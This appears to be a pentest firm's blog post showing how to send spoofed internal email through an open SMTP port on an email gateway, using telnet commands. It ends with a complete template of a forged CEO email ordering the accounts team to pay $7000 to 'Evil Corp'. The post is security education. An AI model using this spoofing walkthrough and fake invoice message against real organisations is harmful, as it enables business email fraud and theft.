Your Basket
Cyber security for any size of business
CREST member company
Team of friendly certified experts
Bypassing Email Protection

Bypassing Email Protection

Every now and again, during a pentest, we will find an SMTP device that is deployed on a client site to provide better protection levels. A great example here is the Fortigate email, it is one of the common email gateway appliances encountered.

So what can we do with it?

Well, here is the kicker. 99.999% of the email protection vendors will sell you a basic appliance but for the protection you need to pay more. Crazy right? You thought you were protected. Being able to send email internally from a trusted device on the target network might just end up in the recipients inbox and if there is no impersonation protection running, then you can send from anyone in the business.

Where do we find people in the business? Linkedin, Facebook, Crunch, there are many sources. Of course, once you have an open SMTP connection, you can test the recipients mailbox box validity without sending any emails, but that is for another post later in the month.

How to test STMP servers with telnet

This is very simple indeed. Open your favourate telnet client and make a telnet connection to the available SMTP port on the appliance. For example:

telnet fortigate.hedgehogdemo.com 25

Something similar to the following should now be displayed:

Trying 169.254.1.13...
Connected to fortigate.hedgehogdemo.com (169.251.1.13).
Escape character is '^]'.
220 fortigate.hedgehogdemo.com ESMTP Smtpd; Sat, 7 Aug 2021 03:18:07 +0100

The first command we need to issue to the mail server is the EHLO  or HELO.  This is a basic greeting that starts the communication between the telnet client and the SMTP server. 

EHLO alice.umbrella.corp

Something similar to the following should be returned:

250-fotigate.hedgehogdemo Hello alice.umbrella.corp [169.254.14.162], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE 20480000
250-DSN
250-STARTTLS
250-DELIVERBY
250 HELP

This shows the SMTP commands that the SMTP server accepts.  Not all SMTP servers support the same sets of commands.

The next command we need to issue is the MAIL FROM command.  This determines the address to which bounces are sent. This is not the same as the from header, which is the email address shown in an email client.

MAIL FROM: <ceo@hedgehogdemo.com> 
250 2.1.0 MAIL ok

Now that the MAIL FROM  command has been sent we can send the RCPT TO  command.  This command tells the SMTP mail server to who the message should be sent. This can be the same or different than the to header, which is the email address shown in the email client.

RCPT TO: <accounts@hedgehogdemo.com>
250 2.1.5 <accounts@hedgehogdemo.com> ok

The last command to run before starting the body of the message is the DATA  command.  This command lets the SMTP mail server know that everything else about to be sent is the body of the message (which also contains the headers).

DATA
354 send message

You will end up with a sort of interactive shell. Now to send an email to someone on the inside. Using something like the below example has been fruitful in many phishing tests.

EHLO alice.umbrella.corp
MAIL FROM: <ceo@hedgehogdemo.com>
RCPT TO: <accounts@hedgehogdemo.com>
DATA
From: "The CEO" <ceo@hedgehogdemo.com>
To: "Accounts Team" <accounts@hedgehogdemo.com>
Subject: Please pay the invoice below asap
Date: Sat, 07 Aug 2021 13:11:57 +0100

Hi
Please can you pay $7000.00 to Evil Corp on sort code 11-11-11 account number 12345678.
Thanks
The CEO

.

The last period "." is important, this tells the SMTP service that the data stream is ended and to process the mail.

Sign up to our newsletter

Keep up to date with the latest cyber security news and updates with our newsletter